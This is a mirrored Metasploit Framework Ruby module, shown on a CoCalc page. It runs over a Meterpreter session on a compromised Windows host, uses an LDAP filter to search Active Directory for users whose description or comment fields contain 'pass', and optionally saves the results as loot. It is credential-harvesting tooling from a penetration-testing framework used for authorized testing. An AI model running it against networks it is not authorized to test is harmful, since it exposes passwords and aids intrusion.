Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/enum_ad_user_comments.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Auxiliary::Report
8
include Msf::Post::Windows::LDAP
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Windows Gather Active Directory User Comments',
15
'Description' => %q{
16
This module will enumerate user accounts in the default Active Domain (AD) directory which
17
contain 'pass' in their description or comment (case-insensitive) by default. In some cases,
18
such users have their passwords specified in these fields.
19
},
20
'License' => MSF_LICENSE,
21
'Author' => [ 'Ben Campbell' ],
22
'Platform' => [ 'win' ],
23
'SessionTypes' => [ 'meterpreter' ],
24
'References' => [
25
['URL', 'http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx'],
26
],
27
'Notes' => {
28
'Stability' => [CRASH_SAFE],
29
'SideEffects' => [],
30
'Reliability' => []
31
}
32
)
33
)
34
35
register_options([
36
OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]),
37
OptString.new('FIELDS', [true, 'Fields to retrieve.', 'userPrincipalName,sAMAccountName,userAccountControl,comment,description']),
38
OptString.new('FILTER', [true, 'Search filter.', '(&(&(objectCategory=person)(objectClass=user))(|(description=*pass*)(comment=*pass*)))']),
39
])
40
end
41
42
def run
43
fields = datastore['FIELDS'].gsub(/\s+/, '').split(',')
44
search_filter = datastore['FILTER']
45
max_search = datastore['MAX_SEARCH']
46
47
begin
48
q = query(search_filter, max_search, fields)
49
if q.nil? || q[:results].empty?
50
return
51
end
52
rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e
53
# Can't bind or in a network w/ limited accounts
54
print_error(e.message)
55
return
56
end
57
58
# Results table holds raw string data
59
results_table = Rex::Text::Table.new(
60
'Header' => 'Domain Users',
61
'Indent' => 1,
62
'SortIndex' => -1,
63
'Columns' => fields
64
)
65
66
q[:results].each do |result|
67
row = []
68
69
result.each do |field|
70
if field[:value].nil?
71
row << ''
72
else
73
row << field[:value]
74
75
end
76
end
77
78
results_table << row
79
end
80
81
print_line results_table.to_s
82
83
if datastore['STORE_LOOT']
84
stored_path = store_loot('ad.users', 'text/plain', session, results_table.to_csv)
85
print_good("Results saved to: #{stored_path}")
86
end
87
end
88
end
89
90